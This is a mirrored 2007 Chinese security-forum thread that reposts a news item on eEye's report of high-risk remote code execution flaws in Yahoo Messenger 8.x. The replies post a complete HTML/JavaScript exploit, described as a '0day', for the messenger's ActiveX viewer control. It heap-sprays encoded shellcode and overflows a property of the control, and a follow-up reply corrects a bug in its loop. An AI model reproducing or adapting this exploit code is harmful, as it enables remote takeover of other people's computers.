返回信息流【赛迪网讯】6月8日消息,据国外媒体报道,安全研究公司eEye Digital Security日前表示,在Yahoo Messenger(雅虎通)中发现高危安全漏洞,允许黑客控制用户计算机系统。
eEye Digital Security日前表示,Yahoo Messenger存在多处漏洞,在用户极少干预的前提下,黑客可以远程在用户计算机中执行恶意代码。
据eEye称,受影响的Yahoo Messenger版本为8.x,危险级别为“高”。目前,eEye已经将上述漏洞报告给雅虎,而雅虎正在调查此事,补丁程序也正在开发之中。
这是一条镜像帖。来源:北邮人论坛 / security / #11656同步于 2007/6/8
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖
雅虎Messenger曝高危漏洞 黑客可控制系统
flyingkisser
2007/6/8镜像同步2 回复
订阅后,新回复会通过你的通知中心匿名送达。
2 条回复
This affects the viewer ywcvwr.dll with yahoo messenger
latest version tested.
Fixed bug in last post
(x=0;xi<800;x++) should be (x=0; x<800; x++)
Here is your 2nd 0day!!!
link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856
<html>
<object classid='clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277' id='target'></object>
<script>
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<800; x++) memory[x] = block + shellcode;
var buffer = '\x0a';
while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';
target.server = buffer;
target.receive();
</script>
</html>